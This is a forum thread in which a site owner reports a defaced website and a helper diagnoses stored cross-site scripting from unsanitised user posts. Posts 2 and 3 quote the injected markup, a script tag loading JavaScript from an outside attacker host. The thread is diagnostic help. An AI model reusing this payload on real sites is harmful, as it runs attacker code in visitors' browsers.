SitePoint Sponsor

User Tag List

Results 1 to 7 of 7
  1. #1
    SitePoint Member
    Join Date
    Jan 2011
    Location
    canada
    Posts
    12
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    site has been hacked pls help me to sove ..

    Hi,

    my site has been hacked some one from my past forums has done , i see my some pages but especially my home page are displayed with hacked messages ... pls help me..

    http://www.bharatdesi.com

    Thanks in Advance ...

  2. #2
    Unobtrusively zen silver trophybronze trophy
    paul_wilkins's Avatar
    Join Date
    Jan 2007
    Location
    Christchurch, New Zealand
    Posts
    14,729
    Mentioned
    104 Post(s)
    Tagged
    4 Thread(s)
    It looks like you are passing untrusted submitted data directly through to your web page.

    Here is where it is coming from, your top spots section.

    Code html4strict:
    <ul class="topSpots">
        <li><span class="hStyle03">
            <a href="view_desitalk.php?desi_id=266" title="\"><script src=http://unixshellcoder.fiz.su/hk.js></script></b>">"><script src=http://unixshell...</a></span><br />Location: Ahmedabad</li>
        <li><span class="hStyle03">
            <a href="view_desitalk.php?desi_id=265" title="I am codrrrrrrrrrr">I am codrrrrrrrrrr</a></span><br />Location: Washington</li>

    Get rid of posts 265 and 266, then get help from the PHP forum on how to protect yourself from other similar attempts.
    Programming Group Advisor
    Reference: JavaScript, Quirksmode Validate: HTML Validation, JSLint
    Car is to Carpet as Java is to JavaScript

  3. #3
    SitePoint Member
    Join Date
    Jan 2011
    Location
    canada
    Posts
    12
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by pmw57 View Post
    It looks like you are passing untrusted submitted data directly through to your web page.

    Here is where it is coming from, your top spots section.

    Code html4strict:
    <ul class="topSpots">
        <li><span class="hStyle03">
            <a href="view_desitalk.php?desi_id=266" title="\"><script src=http://unixshellcoder.fiz.su/hk.js></script></b>">"><script src=http://unixshell...</a></span><br />Location: Ahmedabad</li>
        <li><span class="hStyle03">
            <a href="view_desitalk.php?desi_id=265" title="I am codrrrrrrrrrr">I am codrrrrrrrrrr</a></span><br />Location: Washington</li>

    Get rid of posts 265 and 266, then get help from the PHP forum on how to protect yourself from other similar attempts.
    hi again this is solved and this guy is trying again ... is there any solution...

  4. #4
    Unobtrusively zen silver trophybronze trophy
    paul_wilkins's Avatar
    Join Date
    Jan 2007
    Location
    Christchurch, New Zealand
    Posts
    14,729
    Mentioned
    104 Post(s)
    Tagged
    4 Thread(s)
    Repeat: Go to the PHP forum on how to protect yourself from other similar attempts.
    Last edited by paul_wilkins; Jan 12, 2011 at 05:30. Reason: moved thread
    Programming Group Advisor
    Reference: JavaScript, Quirksmode Validate: HTML Validation, JSLint
    Car is to Carpet as Java is to JavaScript

  5. #5
    SitePoint Member
    Join Date
    Jan 2011
    Location
    canada
    Posts
    12
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    how can i delete these postings or replies ...
    can you suggest some one who is in charge now ...

    Thanks
    Last edited by Geetbharat; Jan 12, 2011 at 05:41. Reason: its midnight so asking help from some other programmer...

  6. #6
    Unobtrusively zen silver trophybronze trophy
    paul_wilkins's Avatar
    Join Date
    Jan 2007
    Location
    Christchurch, New Zealand
    Posts
    14,729
    Mentioned
    104 Post(s)
    Tagged
    4 Thread(s)
    Sorry man, someone else will have to help here.
    It's long after midnight for me and my eyes are killing me.

    All the best.
    Programming Group Advisor
    Reference: JavaScript, Quirksmode Validate: HTML Validation, JSLint
    Car is to Carpet as Java is to JavaScript

  7. #7
    SitePoint Evangelist venkat6134's Avatar
    Join Date
    Jul 2010
    Posts
    454
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hi,
    Now it is working na.
    Showing nicely..
    Then where the problem is?


Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •